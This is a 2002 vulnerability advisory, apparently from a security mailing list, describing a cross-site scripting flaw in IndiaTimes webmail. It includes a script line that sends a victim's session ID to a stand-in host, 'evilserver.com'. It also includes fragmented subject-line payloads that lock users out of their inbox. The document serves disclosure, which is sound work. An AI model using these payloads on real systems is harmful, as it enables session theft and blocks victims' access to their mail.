IndiaTimes.com - Email - Session hijacking and Inbox Blocking ------------------------------------------------------------------- Name : IndiaTimes.com - Email - Session hijacking and Inbox Blocking WebSite : http://email.indiatimes.com Date : April 26, 2002 Vuln Type : Cross site scripting Severity : Moderate Vendor : Unknown HomePage : www.indiatimes.com ------------------------------------------------------------------- DISCUSSION: ------------------------------------------------------------------- Email.indiatimes.com is a very popular Web-Email facility provided by www.indiatimes.com, online version of newspaper 'The Times Of India'. The script allows user to embed HTML and also javascript in the mail. So, it is possible to insert evil code in the mail. Although the script doesn't use cookies but still it is possible to hijack a user's session by sending him a mail, even if the he doesn't read the mail. Let me convert the whole Discussion in Dialog Form: Q: How can a session be hijacked? The site doesn't use cookies. A: Well, The site doesn't use cookies but the session ID/Key is contained in <Form name=Rform ...> <input type=hidden name=SID value="some_random_number:> </form>. This SID is the only token required to authenticate user. So, evil may pass this to a script installed at some server, from where he can misuse it. Example: <script> self.location.href="http://evilserver.com/evil.cgi?SID="+Rform.SID.value </script> Q: The user may choose not to read the evil's mail.Then? A: After clicking 'inbox' whole list of mails appears showing the subject and sender's address of each mail. The <SCRIPT> embedded by the sender in the 'Subject' is executed as soon as user tries to open the inbox. This makes the user even more vulnerable to attack. Q: Hey, wait a minute. Only 30 characters of a 'Subject' are displayed. So, if one tries to insert script in the 'Subject' he can only write a code of 13 characters(30-strlen('<SCRIPT></SCRIPT>'). It is impossible to write a code of 13 characters to exploit the above vuln. A: Well, it is possible. Let me show you. One may fragment the code into smaller parts and send the fragments in subjects of separate mails ,continuously in the following way: */</script> */history.go(-1)/* <script>*/ This will not allow the user to open his inbox. Now, see the beauty of comments and the reverse order or lines. The comment will help joining of the code and since the most recent mesg is on the top, the order reverses. Q: The user may disable JavaScript in the browser's setting. A: Then, your whole site stops working. IMPACT: --------------------------------------------------------------------- Because of high number of users of Email.indiatimes.com, this vulnerability poses a great risk. SOLUTION: --------------------------------------------------------------------- The vendor was notified but there is no response so far. The users may choose to view the Lynx version of Email.indiatimes.com. DISCLAIMER: --------------------------------------------------------------------- The information within this document may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any consequences whatsoever arising out of or in connection with the use or spread of this information. Any use of this information lays within the user's responsibility. FEEDBACK: --------------------------------------------------------------------- In case of any queries, please don't hesitate in dropping me a mail. Thanks, *************************|<<---/\--->>|*********************************** Sandeep Giri | System Administrator(Intranet)| For finding anything your need two things: Indian Institute of Technology| 1. Will Roorkee-247667 | 2. Google India | *************************|<<---\/--->>|***********************************
This archive was generated by hypermail 2b30 : Fri Apr 26 2002 - 13:48:58 PDT